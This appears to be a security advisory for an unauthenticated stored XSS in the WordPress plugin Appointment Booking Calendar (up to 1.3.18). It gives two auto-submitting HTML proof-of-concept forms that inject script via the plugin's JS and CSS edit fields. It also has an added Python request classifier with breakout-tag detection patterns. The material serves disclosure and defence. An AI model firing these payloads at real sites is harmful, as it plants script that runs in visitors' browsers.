Appointment Booking Calendar <= 1.3.18 – Unauthenticated Stored XSS
<body onload="document.forms[0].submit();">
  <form action="https://<BLOG>/wp-admin/admin-ajax.php" method="POST">
    <input type="hidden" name="CP_ABC_post_edition" value=""/>
    <input type="hidden" name="cfwpp_edit" value="js"/>
    <input type="hidden" name="editionarea" value="</script><svg/onload=alert(/XSS-JS/)>"/>
  </form>
</body>

<body onload="document.forms[0].submit();">
  <form action="https://<BLOG>/wp-admin/admin-ajax.php" method="POST">
    <input type="hidden" name="CP_ABC_post_edition" value=""/>
    <input type="hidden" name="cfwpp_edit" value="css"/>
    <input type="hidden" name="editionarea" value="</style><svg/onload=alert(/XSS-CSS/)>"/>
  </form>
</body>

The payload is triggered on every page with a booking form.
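Both requests above have the same recognisable shape, so a reverse proxy or log pipeline can flag them. The following Python is an added example, not code from the advisory or the plugin: the parameter names come from the proof of concept, while `classify`, its verdict names, the `wordpress_logged_in_` cookie check and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlencode

AJAX_PATH = "/wp-admin/admin-ajax.php"
# Parameter names as they appear in the proof of concept.
TRIGGER, MODE, CONTENT = "CP_ABC_post_edition", "cfwpp_edit", "editionarea"
# A closing tag for the block the value is stored in ends that block early.
BREAKOUT = {
    "js": re.compile(r"</script[\s/>]", re.IGNORECASE),
    "css": re.compile(r"</style[\s/>]", re.IGNORECASE),
}


def classify(method, path, cookie_header, body):
    """Return 'ignore', 'review' or 'block' for one HTTP request."""
    if method.upper() != "POST" or not path.split("?")[0].endswith(AJAX_PATH):
        return "ignore"
    # keep_blank_values matters: the trigger parameter is sent empty, and
    # parse_qs drops empty values by default.
    form = parse_qs(body, keep_blank_values=True)
    if TRIGGER not in form:
        return "ignore"
    mode = form.get(MODE, [""])[0].lower()
    content = form.get(CONTENT, [""])[0]
    pattern = BREAKOUT.get(mode)
    if pattern and pattern.search(content):
        return "block"
    # Assumption: a session cookie named wordpress_logged_in_* marks a
    # logged-in user; an edit without one is the unauthenticated case.
    logged_in = "wordpress_logged_in_" in (cookie_header or "")
    return "ignore" if logged_in else "review"


def form_body(mode, content):
    """Build a urlencoded body shaped like the PoC form submission."""
    return urlencode({TRIGGER: "", MODE: mode, CONTENT: content})


# Constructed sample requests: (method, path, Cookie header, body).
SAMPLES = [
    ("POST", AJAX_PATH, "", form_body("js", "</script><svg/onload=alert(/XSS-JS/)>")),
    ("POST", AJAX_PATH, "", form_body("css", "</style><svg/onload=alert(/XSS-CSS/)>")),
    ("POST", AJAX_PATH, "", form_body("css", ".booking { color: #333; }")),
    ("POST", AJAX_PATH, "wordpress_logged_in_x=constructed", form_body("css", ".a{}")),
    ("POST", AJAX_PATH, "", "action=heartbeat"),
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(classify(*sample), sample[3][:60])
```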
